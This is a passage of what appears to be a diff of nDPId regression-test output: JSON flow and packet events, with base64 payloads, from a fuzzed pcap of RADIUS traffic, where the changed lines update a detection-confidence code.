qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1528997311323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997311323,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQZAAP8RAAAKDEAexuAZNXIQBxQCxwAAAVACv44mJt0CcxbAbqYZaENsgGMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfIdQlXSVNQUmMwGgkAADghDQMxNwZbIqW\/ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLk1jYzMxMS4zZ3BwbmV0d29ydi5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmZiM2E1MjI1YiwgNXIyMmE1YjMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwNbGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQIAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGxFBKmVASgNwWy5gYQ7uGHIUIDaTD8g=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997395223} 01255{"packet_event_id":1,"packet_event_name":"packet","packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997394907,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1528997399308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997399308,"pkt":"ABRPJQDqcNuYVcUnCABFAADhALRAAPwRUxbG4hk1CgwlAAcUchAAzVpOC1QAxRxqj+ts\/zbuXZza\/XyA7U4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b1ZrLm9yZywgNWIyMiUAMTIvZjA6Nxk6NjA6ZDE6N2S6MzcvMjI0T0oBAgBIFwEAAAEFAAClYf4DzpLiqdyPyTgI99pYAgUAAG+BQKA0HAAAC9tSu9kUjAmLAQACCwUAANTPOn7BAwke3m06BT0FpdxQErKfyMWPNDJCfwFi2pzKF6M="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997399801} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997399604,"pkt":"ABRP+4pTcNuYVcUnCAAbAAEwAL1AAPwRUr7G4hk1CgxAHgcUchABHDwbAlUBFM63G2\/ABME95vC\/YtPM3\/caCwAAV8gbBVNQQxpuAAABNxA0xuSFjY5XIJgFQGu0Uv0OYONLFS6YzD8pAXH0KZXHpfwyK4L\/92l5H6gqAq8nL0kepb8RNLxJYMKQCK0eGlYCRiBKtSavfrre3EDS6oPiPCuIZCCfvU44Ccl11WwK9jFxTgAolMtFATUwMzFPNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1DYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNjEyL2YwOjc5OjYwOmQxOjdkOjM3LzIyNFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBL2pfBK3Ll7exMTohpXZCAH"} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1528997403593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997403593,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQxAAP8RAAAKDEBuxuIZNXIQBxQCxwAAAVYCv+kKLAd5QTZEtH35XGAZbVIaCgAAV8gOBMFTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqYbATUwMzExNDgwMDczNmM4MDcyQHdkYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQgLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzExMmE2MjI1YiwgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAEBRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ZTAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1528997403841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997403841,"pkt":"ABRP+4rqUtuYVcUnCABFAADhAMdAAPwRUwNI4hk1CgxAHgcUchAAzZCBC1YAxcgsJl6LYV\/S6USqzg063n4BZDAzMTE0ODAwNzM2MzgwNzJAd01hbi55bmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0T0oBAgBIFwEAAAEFAADHRYXcoWwXwUZiNDAUiPZYAgUAAKf5M2Yd6gAAEyJCfEY39q2LAQACCwUAABPeNlqa\/2jA+R6oV5E\/laFQEt3nRw9TK906hgwY5FpY4\/w="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1528996068129,"flow_last_seen":1528997404349,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":37428,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1528996068129,"flow_last_seen":1528997404349,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":37428,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476267} 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"AAAMB6xAABRPqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476466} 00607{"packet_event_id":1,"packet_event_name":"packet","packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"ABRP+4rqcNuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 